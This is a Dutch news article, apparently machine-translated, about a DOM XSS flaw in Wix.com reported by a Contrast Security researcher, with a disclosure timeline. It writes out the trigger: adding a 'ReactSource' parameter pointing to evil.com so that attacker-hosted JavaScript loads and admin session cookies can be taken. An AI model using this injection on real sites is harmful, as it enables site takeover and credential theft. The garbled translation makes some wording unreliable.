Heb je gehoord van wix(.)met?
Wix.com is een cloud-gebaseerde web development platform is ontworpen voor gebruikers om HTML5 websites en mobiele sites te bouwen door middel van het gebruik van online drag and drop gereedschappen van het bedrijf.
Helaas, een ernstig XSS-bug is ontdekt op het platform momenteel in gevaar te brengen miljoenen websites en gebruikers.
Wix(.)com heeft een ernstige bug XSS, onderzoeker zegt
Zoals gemeld door de beveiliging onderzoekers, de service host miljoenen websites met 87 miljoen geregistreerde gebruikers. Het enge deel is dat alle gebruikers zijn gevoelig voor deze XSS kwetsbaarheid. Dit laatste kan worden ingezet door aanvallers in een worm-achtige manier administrator accounts over te nemen. Zodra dit is gebeurd, de aanvallers krijgen de volledige controle over de gecompromitteerde websites.
Het XSS kwetsbaarheid werd bekendgemaakt door Matt Austin van Contrast Beveiliging. Hij schreef:
Wix.com heeft een ernstige DOM XSS kwetsbaarheid dat een aanvaller volledige controle over een website gehost bij Wix maakt. Simpelweg door het toevoegen van een enkele parameter om een site gemaakt op Wix, de aanvaller kan zorgen dat de JavaScript zijn geladen en uitgevoerd als onderdeel van de doelwebsite.
Een eenvoudige regel code is genoeg om de bug te activeren
De aanval kan worden geactiveerd alleen door toevoeging van een eenvoudige omleiding opdracht om een URL van wix(.)met. Het resultaat wordt omgeleid naar kwaadaardige JavaScrip. Zie hieronder een voorbeeld:
- Toevoegen: ?ReactSource=https://evil.com naar een URL voor een site gemaakt op wix.com.
- Zorg ervoor dat evil.com biedt onderdak aan een kwaadaardig bestand op /packages-bin/wixCodeInit/wixCodeInit.min.js
Deze eenvoudige lijnen codes zijn voldoende voor de aanvallers te zorgen dat hun JS geladen en geactiveerd als deel van de gerichte website, De onderzoeker legt uit. Aanvallers zijn ook in staat om toegang tot de admin sessie-cookies en middelen krijgen, een zeer slecht scenario inderdaad. Wanneer een sessie cookie wordt geoogst, aanvallers kunnen de DOM XSS vrij te positioneren in een iframe. Dit wordt gedaan om schadelijke inhoud te hosten op een website beheerd door een operator.
Bij succes, Deze aanval kan worden ingezet voor de verspreiding van malware, website modificatie, cryptogeld mining, wijzigen van accountgegevens, etc.
Wat zei Wix zeggen?
Wat betreft de communicatie met wix(.)met, de onderzoeker de aandelen van de volgende ervaring:
Oktober 10: Creëert draagvlak ticket aanvragen van veiligheid contact
Oktober 11: Reiken aan @wix op twitter om een zekerheid contact te zoeken. Geantwoord op standaard ondersteuning gebruiken. Gave details gecreëerd ticket. Ticket pagina werkt niet meer. https://www.wix.com/support/html5/contact.
Oktober 14: Ontvangen standaard "We onderzoeken de zaak en zal de follow-up zo snel mogelijk" antwoord van Wix.
Oktober 20: Reageer ticket aanvragen van een update. (geen antwoord)
Oktober 27: Tweede verzoek om een update. (geen antwoord)
Op oktober 28, de onderzoeker eindelijk een reageren waarin stond dat de
groep die u geprobeerd contact op te nemen (veiligheid) kan niet bestaan, of u kunt geen toestemming om berichten naar de groep.
Niettemin, de CEO van Wix Avishai Abrahami uiteindelijk toegegeven dat bepaalde aspecten van het platform is gebaseerd op de WordPress open-source library. Hij beweert dat wat werd verbeterd werd terug vrijgegeven aan de gemeenschap, ZDNet meldt.
Milena Dimitrova
Een bevlogen schrijver en contentmanager die sinds de start van het project bij SensorsTechForum werkt. Een professional met 10+ jarenlange ervaring in het creëren van boeiende inhoud. Gericht op de privacy van gebruikers en malware ontwikkeling, ze gelooft sterk in een wereld waar cybersecurity speelt een centrale rol. Als het gezond verstand heeft geen zin, ze zullen er zijn om aantekeningen te maken. Deze toelichtingen kunnen later om te zetten in artikelen! Volg Milena @Milenyim
Volg mij: